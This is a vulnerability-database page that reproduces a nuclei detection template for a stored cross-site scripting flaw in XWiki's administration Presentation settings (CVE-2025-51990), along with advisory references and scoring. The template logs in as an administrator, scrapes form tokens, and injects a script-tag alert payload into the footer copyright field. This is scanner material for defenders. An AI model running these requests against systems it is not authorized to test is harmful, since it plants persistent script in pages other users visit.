Lucene search
K

XWiki – Stored Cross-Site Scripting (XSS)

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

XWiki stored cross site scripting via improper sanitization in Admin Presentation allows authenticated admins to inject JavaScript.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
Vulnerability of the HTTP Meta Info fields, Footer Copyright, and Footer Version fields in the administration interface for creating collaborative web applications – XWiki Platform. This allows attackers to perform cross-site scripting attacks (XSS).
28 Oct 202500:00
bdu_fstec
Circl
CVE-2025-51990
11 Nov 202513:01
circl
CNNVD
XWiki Platform 安全漏洞
20 Aug 202500:00
cnnvd
CVE
CVE-2025-51990
20 Aug 202500:00
cve
Cvelist
CVE-2025-51990
20 Aug 202500:00
cvelist
EUVD
EUVD-2025-25311
3 Oct 202520:07
euvd
NVD
CVE-2025-51990
20 Aug 202515:15
nvd
OSV
CVE-2025-51990
20 Aug 202515:15
osv
Positive Technologies
PT-2025-34071
16 Aug 202500:00
ptsecurity
RedhatCVE
CVE-2025-51990
22 Aug 202500:22
redhatcve
Rows per page
id: CVE-2025-51990

info:
  name: XWiki – Stored Cross-Site Scripting (XSS)
  author: 0x_Akoko
  severity: medium
  description: |
    XWiki through version 17.3.0 contains stored cross-site scripting caused by improper sanitization of inputs in the Administration interface's Presentation section, letting authenticated administrators inject JavaScript that executes in visitors' browsers, exploit requires administrator authentication.
  impact: |
    Attackers can execute persistent scripts in users' browsers, leading to session hijacking, credential theft, and unauthorized actions without user interaction.
  remediation: |
    Update to a version later than 17.3.0 or the latest available version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51990
    - https://github.com/malcxlmj/cve-writeups/blob/main/CVE-2025-51990.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-79
  metadata:
    max-request: 4
    verified: true
  tags: xwiki,xss,stored-xss,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /bin/login/XWiki/XWikiLogin HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: login_token
        internal: true
        regex:
          - 'name="form_token" value="([^"]+)"'
        group: 1

  - raw:
      - |
        POST /bin/loginsubmit/XWiki/XWikiLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xredirect=&form_token={{login_token}}&j_username={{username}}&j_password={{password}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(location, '/bin/view/Main/')
        condition: and
        internal: true

  - raw:
      - |
        GET /bin/admin/XWiki/XWikiPreferences?editor=globaladmin&section=Presentation HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: form_token
        internal: true
        regex:
          - 'data-xwiki-form-token="([^"]+)"'
        group: 1

  - raw:
      - |
        POST /bin/saveandcontinue/XWiki/XWikiPreferences HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        XWiki.XWikiPreferences_0_showannotations=&XWiki.XWikiPreferences_0_showcomments=&XWiki.XWikiPreferences_0_showattachments=&XWiki.XWikiPreferences_0_showhistory=&XWiki.XWikiPreferences_0_showinformation=&XWiki.XWikiPreferences_0_title=&XWiki.XWikiPreferences_0_meta=&XWiki.XWikiPreferences_0_webcopyright=%3CScRiPt%3Ealert%28%27{{randstr}}%27%29%3B%3C%2FScRiPt%3E&XWiki.XWikiPreferences_0_version=&form_token={{form_token}}&xcontinue=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&xredirect=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&classname=XWiki.XWikiPreferences&formactionsac=Save

      - |
        GET /bin/admin/XWiki/XWikiPreferences HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, '<ScRiPt>alert(\'{{randstr}}\');</ScRiPt>')
          - contains(body, 'footerglobal')
        condition: and
# digest: 4b0a004830460221009e419baee72db81aa452b81a9342c52c18abfd2c4af13b76ffbdfdc49f2f3fb5022100e81c6643d39662e840cf7f81dc89ccb93bbaea762e9bd2112e826d09245514fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.14.8
EPSS0.00464
SSVC
6